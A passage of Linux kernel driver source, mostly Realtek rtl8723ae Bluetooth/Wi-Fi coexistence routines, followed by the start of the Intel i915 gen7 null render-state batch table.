if ((rtlhal->hal_coex_8723.bt_inq_page_start_time) ||
(BT_TXRX_CNT_LEVEL_3 == bt_tx_rx_cnt_lvl)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], Set BT inquiry / page scan 0x3a setting\n");
btdm8723.ps_tdma_on = true;
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
}
if (rtl8723ae_dm_bt_is_coexist_state_changed(hw))
rtl8723ae_dm_bt_set_bt_dm(hw, &btdm8723);
}
static void rtl8723ae_dm_bt_2_ant_fta2dp(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_phy *rtlphy = &(rtlpriv->phy);
struct btdm_8723 btdm8723;
u8 bt_rssi_state, bt_rssi_state1;
u32 bt_tx_rx_cnt_lvl;
rtl8723ae_dm_bt_btdm_structure_reload(hw, &btdm8723);
btdm8723.rf_rx_lpf_shrink = true;
btdm8723.low_penalty_rate_adaptive = true;
btdm8723.reject_aggre_pkt = false;
bt_tx_rx_cnt_lvl = rtl8723ae_dm_bt_bt_tx_rx_counter_level(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters = %d\n", bt_tx_rx_cnt_lvl);
if (rtlphy->current_chan_bw == HT_CHANNEL_WIDTH_20_40) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG, "HT40\n");
bt_rssi_state = rtl8723ae_dm_bt_check_coex_rssi_state(hw, 2,
37, 0);
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = true;
btdm8723.sw_dac_swing_on = false;
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if ((bt_rssi_state == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi high\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi low\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
}
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"HT20 or Legacy\n");
bt_rssi_state = rtl8723ae_dm_bt_check_coex_rssi_state(hw, 2,
47, 0);
bt_rssi_state1 = rtl8723ae_dm_bt_check_coex_rssi_state1(hw, 2,
27, 0);
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
if ((bt_rssi_state == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi high\n");
btdm8723.agc_table_en = true;
btdm8723.adc_back_off_on = true;
btdm8723.sw_dac_swing_on = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi low\n");
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
}
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if ((bt_rssi_state1 == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state1 == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 high\n");
/* only rssi high we need to do this,
* when rssi low, the value will modified by fw
*/
rtl_write_byte(rtlpriv, 0x883, 0x40);
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 low\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
}
}
}
if (rtl8723ae_dm_bt_need_to_dec_bt_pwr(hw))
btdm8723.dec_bt_pwr = true;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT btInqPageStartTime = 0x%x, btTxRxCntLvl = %d\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time,
bt_tx_rx_cnt_lvl);
if ((rtlhal->hal_coex_8723.bt_inq_page_start_time) ||
(BT_TXRX_CNT_LEVEL_3 == bt_tx_rx_cnt_lvl)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], Set BT inquiry / page scan 0x3a setting\n");
btdm8723.ps_tdma_on = true;
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
}
if (rtl8723ae_dm_bt_is_coexist_state_changed(hw))
rtl8723ae_dm_bt_set_bt_dm(hw, &btdm8723);
}
static void rtl8723ae_dm_bt_inq_page_monitor(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
u32 cur_time = jiffies;
if (rtlhal->hal_coex_8723.c2h_bt_inquiry_page) {
/* bt inquiry or page is started. */
if (rtlhal->hal_coex_8723.bt_inq_page_start_time == 0) {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BT_INQ_PAGE;
rtlhal->hal_coex_8723.bt_inq_page_start_time = cur_time;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT Inquiry/page is started at time : 0x%x\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time);
}
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT Inquiry/page started time : 0x%x, cur_time : 0x%x\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time, cur_time);
if (rtlhal->hal_coex_8723.bt_inq_page_start_time) {
if ((((long)cur_time -
(long)rtlhal->hal_coex_8723.bt_inq_page_start_time) / HZ) >=
10) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT Inquiry/page >= 10sec!!!");
rtlhal->hal_coex_8723.bt_inq_page_start_time = 0;
rtlpcipriv->bt_coexist.cstate &=
~BT_COEX_STATE_BT_INQ_PAGE;
}
}
}
static void rtl8723ae_dm_bt_reset_action_profile_state(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
rtlpcipriv->bt_coexist.cstate &=
~(BT_COEX_STATE_PROFILE_HID | BT_COEX_STATE_PROFILE_A2DP |
BT_COEX_STATE_PROFILE_PAN | BT_COEX_STATE_PROFILE_SCO);
rtlpcipriv->bt_coexist.cstate &=
~(BT_COEX_STATE_BTINFO_COMMON |
BT_COEX_STATE_BTINFO_B_HID_SCOESCO |
BT_COEX_STATE_BTINFO_B_FTP_A2DP);
}
static void _rtl8723ae_dm_bt_coexist_2_ant(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 bt_info_original;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex] Get bt info by fw!!\n");
_rtl8723_dm_bt_check_wifi_state(hw);
if (rtlhal->hal_coex_8723.c2h_bt_info_req_sent) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex] c2h for btInfo not rcvd yet!!\n");
}
bt_info_original = rtlhal->hal_coex_8723.c2h_bt_info_original;
/* when bt inquiry or page scan, we have to set h2c 0x25
* ignore wlanact for continuous 4x2secs
*/
rtl8723ae_dm_bt_inq_page_monitor(hw);
rtl8723ae_dm_bt_reset_action_profile_state(hw);
if (rtl8723ae_dm_bt_is_2_ant_common_action(hw)) {
rtlpcipriv->bt_coexist.bt_profile_case = BT_COEX_MECH_COMMON;
rtlpcipriv->bt_coexist.bt_profile_action = BT_COEX_MECH_COMMON;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Action 2-Ant common.\n");
} else {
if ((bt_info_original & BTINFO_B_HID) ||
(bt_info_original & BTINFO_B_SCO_BUSY) ||
(bt_info_original & BTINFO_B_SCO_ESCO)) {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BTINFO_B_HID_SCOESCO;
rtlpcipriv->bt_coexist.bt_profile_case =
BT_COEX_MECH_HID_SCO_ESCO;
rtlpcipriv->bt_coexist.bt_profile_action =
BT_COEX_MECH_HID_SCO_ESCO;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BTInfo: bHid|bSCOBusy|bSCOeSCO\n");
rtl8723ae_dm_bt_2_ant_hid_sco_esco(hw);
} else if ((bt_info_original & BTINFO_B_FTP) ||
(bt_info_original & BTINFO_B_A2DP)) {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BTINFO_B_FTP_A2DP;
rtlpcipriv->bt_coexist.bt_profile_case =
BT_COEX_MECH_FTP_A2DP;
rtlpcipriv->bt_coexist.bt_profile_action =
BT_COEX_MECH_FTP_A2DP;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"BTInfo: bFTP|bA2DP\n");
rtl8723ae_dm_bt_2_ant_fta2dp(hw);
} else {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BTINFO_B_HID_SCOESCO;
rtlpcipriv->bt_coexist.bt_profile_case =
BT_COEX_MECH_NONE;
rtlpcipriv->bt_coexist.bt_profile_action =
BT_COEX_MECH_NONE;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BTInfo: undefined case!!!!\n");
rtl8723ae_dm_bt_2_ant_hid_sco_esco(hw);
}
}
}
static void _rtl8723ae_dm_bt_coexist_1_ant(struct ieee80211_hw *hw)
{
}
void rtl8723ae_dm_bt_hw_coex_all_off_8723a(struct ieee80211_hw *hw)
{
rtl8723ae_dm_bt_set_coex_table(hw, 0x5a5aaaaa, 0xcc, 0x3);
rtl8723ae_dm_bt_set_hw_pta_mode(hw, true);
}
void rtl8723ae_dm_bt_fw_coex_all_off_8723a(struct ieee80211_hw *hw)
{
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw, false);
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, false,
TDMA_2ANT, TDMA_NAV_OFF);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, TDMA_2ANT,
TDMA_NAV_OFF, TDMA_DAC_SWING_OFF);
rtl8723ae_dm_bt_set_fw_dac_swing_level(hw, 0);
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_bt_retry_index(hw, 2);
rtl8723ae_dm_bt_set_fw_wlan_act(hw, 0x10, 0x10);
rtl8723ae_dm_bt_set_fw_dec_bt_pwr(hw, false);
}
void rtl8723ae_dm_bt_sw_coex_all_off_8723a(struct ieee80211_hw *hw)
{
rtl8723ae_dm_bt_agc_table(hw, BT_AGCTABLE_OFF);
rtl8723ae_dm_bt_bback_off_level(hw, BT_BB_BACKOFF_OFF);
rtl8723ae_dm_bt_reject_ap_aggregated_packet(hw, false);
rtl8723ae_bt_set_penalty_tx_rate_adap(hw, BT_TX_RATE_ADAPTIVE_NORMAL);
rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(hw, BT_RF_RX_LPF_CORNER_RESUME);
rtl8723ae_dm_bt_set_sw_full_time_dac_swing(hw, false, 0xc0);
}
static void rtl8723ae_dm_bt_query_bt_information(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
u8 h2c_parameter[1] = {0};
rtlhal->hal_coex_8723.c2h_bt_info_req_sent = true;
h2c_parameter[0] |= BIT(0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Query Bt information, write 0x38 = 0x%x\n",
h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x38, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_bt_hw_counters_monitor(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u32 reg_htx_rx, reg_ltx_rx, u32_tmp;
u32 reg_htx, reg_hrx, reg_ltx, reg_lrx;
reg_htx_rx = REG_HIGH_PRIORITY_TXRX;
reg_ltx_rx = REG_LOW_PRIORITY_TXRX;
u32_tmp = rtl_read_dword(rtlpriv, reg_htx_rx);
reg_htx = u32_tmp & MASKLWORD;
reg_hrx = (u32_tmp & MASKHWORD)>>16;
u32_tmp = rtl_read_dword(rtlpriv, reg_ltx_rx);
reg_ltx = u32_tmp & MASKLWORD;
reg_lrx = (u32_tmp & MASKHWORD)>>16;
if (rtlpcipriv->bt_coexist.lps_counter > 1) {
reg_htx %= rtlpcipriv->bt_coexist.lps_counter;
reg_hrx %= rtlpcipriv->bt_coexist.lps_counter;
reg_ltx %= rtlpcipriv->bt_coexist.lps_counter;
reg_lrx %= rtlpcipriv->bt_coexist.lps_counter;
}
rtlhal->hal_coex_8723.high_priority_tx = reg_htx;
rtlhal->hal_coex_8723.high_priority_rx = reg_hrx;
rtlhal->hal_coex_8723.low_priority_tx = reg_ltx;
rtlhal->hal_coex_8723.low_priority_rx = reg_lrx;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"High Priority Tx/Rx (reg 0x%x)=%x(%d)/%x(%d)\n",
reg_htx_rx, reg_htx, reg_htx, reg_hrx, reg_hrx);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Low Priority Tx/Rx (reg 0x%x)=%x(%d)/%x(%d)\n",
reg_ltx_rx, reg_ltx, reg_ltx, reg_lrx, reg_lrx);
rtlpcipriv->bt_coexist.lps_counter = 0;
}
static void rtl8723ae_dm_bt_bt_enable_disable_check(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
bool bt_alife = true;
if (rtlhal->hal_coex_8723.high_priority_tx == 0 &&
rtlhal->hal_coex_8723.high_priority_rx == 0 &&
rtlhal->hal_coex_8723.low_priority_tx == 0 &&
rtlhal->hal_coex_8723.low_priority_rx == 0)
bt_alife = false;
if (rtlhal->hal_coex_8723.high_priority_tx == 0xeaea &&
rtlhal->hal_coex_8723.high_priority_rx == 0xeaea &&
rtlhal->hal_coex_8723.low_priority_tx == 0xeaea &&
rtlhal->hal_coex_8723.low_priority_rx == 0xeaea)
bt_alife = false;
if (rtlhal->hal_coex_8723.high_priority_tx == 0xffff &&
rtlhal->hal_coex_8723.high_priority_rx == 0xffff &&
rtlhal->hal_coex_8723.low_priority_tx == 0xffff &&
rtlhal->hal_coex_8723.low_priority_rx == 0xffff)
bt_alife = false;
if (bt_alife) {
rtlpcipriv->bt_coexist.bt_active_zero_cnt = 0;
rtlpcipriv->bt_coexist.cur_bt_disabled = false;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A BT is enabled !!\n");
} else {
rtlpcipriv->bt_coexist.bt_active_zero_cnt++;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A bt all counters = 0, %d times!!\n",
rtlpcipriv->bt_coexist.bt_active_zero_cnt);
if (rtlpcipriv->bt_coexist.bt_active_zero_cnt >= 2) {
rtlpcipriv->bt_coexist.cur_bt_disabled = true;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A BT is disabled !!\n");
}
}
if (rtlpcipriv->bt_coexist.pre_bt_disabled !=
rtlpcipriv->bt_coexist.cur_bt_disabled) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A BT is from %s to %s!!\n",
(rtlpcipriv->bt_coexist.pre_bt_disabled ?
"disabled" : "enabled"),
(rtlpcipriv->bt_coexist.cur_bt_disabled ?
"disabled" : "enabled"));
rtlpcipriv->bt_coexist.pre_bt_disabled
= rtlpcipriv->bt_coexist.cur_bt_disabled;
}
}
void rtl8723ae_dm_bt_coexist_8723(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
rtl8723ae_dm_bt_query_bt_information(hw);
rtl8723ae_dm_bt_bt_hw_counters_monitor(hw);
rtl8723ae_dm_bt_bt_enable_disable_check(hw);
if (rtlpcipriv->bt_coexist.bt_ant_num == ANT_X2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], 2 Ant mechanism\n");
_rtl8723ae_dm_bt_coexist_2_ant(hw);
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], 1 Ant mechanism\n");
_rtl8723ae_dm_bt_coexist_1_ant(hw);
}
if (!rtl8723ae_dm_bt_is_same_coexist_state(hw)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], Coexist State[bitMap] change from 0x%x%8x to 0x%x%8x\n",
rtlpcipriv->bt_coexist.previous_state_h,
rtlpcipriv->bt_coexist.previous_state,
rtlpcipriv->bt_coexist.cstate_h,
rtlpcipriv->bt_coexist.cstate);
rtlpcipriv->bt_coexist.previous_state
= rtlpcipriv->bt_coexist.cstate;
rtlpcipriv->bt_coexist.previous_state_h
= rtlpcipriv->bt_coexist.cstate_h;
}
}
static void rtl8723ae_dm_bt_parse_bt_info(struct ieee80211_hw *hw,
u8 *tmbuf, u8 len)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 bt_info;
u8 i;
rtlhal->hal_coex_8723.c2h_bt_info_req_sent = false;
rtlhal->hal_coex_8723.bt_retry_cnt = 0;
for (i = 0; i < len; i++) {
if (i == 0)
rtlhal->hal_coex_8723.c2h_bt_info_original = tmbuf[i];
else if (i == 1)
rtlhal->hal_coex_8723.bt_retry_cnt = tmbuf[i];
if (i == len-1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"0x%2x]", tmbuf[i]);
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"0x%2x, ", tmbuf[i]);
}
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"BT info bt_info (Data)= 0x%x\n",
rtlhal->hal_coex_8723.c2h_bt_info_original);
bt_info = rtlhal->hal_coex_8723.c2h_bt_info_original;
if (bt_info & BIT(2))
rtlhal->hal_coex_8723.c2h_bt_inquiry_page = true;
else
rtlhal->hal_coex_8723.c2h_bt_inquiry_page = false;
if (bt_info & BTINFO_B_CONNECTION) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTC2H], BTInfo: bConnect=true\n");
rtlpcipriv->bt_coexist.bt_busy = true;
rtlpcipriv->bt_coexist.cstate &= ~BT_COEX_STATE_BT_IDLE;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTC2H], BTInfo: bConnect=false\n");
rtlpcipriv->bt_coexist.bt_busy = false;
rtlpcipriv->bt_coexist.cstate |= BT_COEX_STATE_BT_IDLE;
}
}
void rtl_8723e_c2h_command_handle(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct c2h_evt_hdr c2h_event;
u8 *ptmbuf;
u8 index;
u8 u1tmp;
memset(&c2h_event, 0, sizeof(c2h_event));
u1tmp = rtl_read_byte(rtlpriv, REG_C2HEVT_MSG_NORMAL);
RT_TRACE(rtlpriv, COMP_FW, DBG_DMESG,
"&&&&&&: REG_C2HEVT_MSG_NORMAL is 0x%x\n", u1tmp);
c2h_event.cmd_id = u1tmp & 0xF;
c2h_event.cmd_len = (u1tmp & 0xF0) >> 4;
c2h_event.cmd_seq = rtl_read_byte(rtlpriv, REG_C2HEVT_MSG_NORMAL + 1);
RT_TRACE(rtlpriv, COMP_FW, DBG_DMESG,
"cmd_id: %d, cmd_len: %d, cmd_seq: %d\n",
c2h_event.cmd_id , c2h_event.cmd_len, c2h_event.cmd_seq);
u1tmp = rtl_read_byte(rtlpriv, 0x01AF);
if (u1tmp == C2H_EVT_HOST_CLOSE) {
return;
} else if (u1tmp != C2H_EVT_FW_CLOSE) {
rtl_write_byte(rtlpriv, 0x1AF, 0x00);
return;
}
ptmbuf = kmalloc(c2h_event.cmd_len, GFP_KERNEL);
if (ptmbuf == NULL) {
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"malloc cmd buf failed\n");
return;
}
/* Read the content */
for (index = 0; index < c2h_event.cmd_len; index++)
ptmbuf[index] = rtl_read_byte(rtlpriv, REG_C2HEVT_MSG_NORMAL +
2 + index);
switch (c2h_event.cmd_id) {
case C2H_BT_RSSI:
break;
case C2H_BT_OP_MODE:
break;
case BT_INFO:
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"BT info Byte[0] (ID) is 0x%x\n", c2h_event.cmd_id);
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"BT info Byte[1] (Seq) is 0x%x\n", c2h_event.cmd_seq);
RT_TRACE(rtlpriv, COMP_FW, DBG_TRACE,
"BT info Byte[2] (Data)= 0x%x\n", ptmbuf[0]);
rtl8723ae_dm_bt_parse_bt_info(hw, ptmbuf, c2h_event.cmd_len);
break;
default:
break;
}
kfree(ptmbuf);
rtl_write_byte(rtlpriv, 0x01AF, C2H_EVT_HOST_CLOSE);
}
<|start_filename|>linux-3.16/drivers/gpu/drm/i915/intel_renderstate_gen7.c<|end_filename|>
#include "intel_renderstate.h"
static const u32 gen7_null_state_relocs[] = {
0x0000000c,
0x00000010,
0x00000018,
0x000001ec,
};
static const u32 gen7_null_state_batch[] = {
0x69040000,
0x61010008,
0x00000000,
0x00000001, /* reloc */
0x00000001, /* reloc */
0x00000000,
0x00000001, /* reloc */
0x00000000,
0x00000001,
0x00000000,
0x00000001,
0x790d0002,
0x00000000,
0x00000000,
0x00000000,
0x78180000,
0x00000001,
0x79160000,
0x00000008,
0x78300000,
0x02010040,
0x78310000,
0x04000000,
0x78320000,
0x04000000,
0x78330000,
0x02000000,
0x78100004,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781b0005,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x781c0002,
0x00000000,
0x00000000,
0x00000000,
0x781d0004,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78110005,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78120002,
0x00000000,
0x00000000,
0x00000000,
0x78210000,
0x00000000,
0x78130005,
0x00000000,
0x20000000,
0x04000000,
0x00000000,
0x00000000,
0x00000000,
0x78140001,
0x20000800,
0x00000000,
0x781e0001,
0x00000000,
0x00000000,
0x78050005,
0xe0040000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78040001,
0x00000000,
0x00000000,
0x78240000,
0x00000240,
0x78230000,
0x00000260,
0x782f0000,
0x00000280,
0x781f000c,
0x00400810,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x00000000,
0x78200006,
0x000002c0,
0x08080000,
0x00000000,
0x28000402,
0x00060000,
0x00000000,
0x00000000,
0x78090005,
0x02000000,
0x22220000,
0x02f60000,
0x11230000,
0x02f60004,
0x11230000,
0x78080003,
0x00006008,
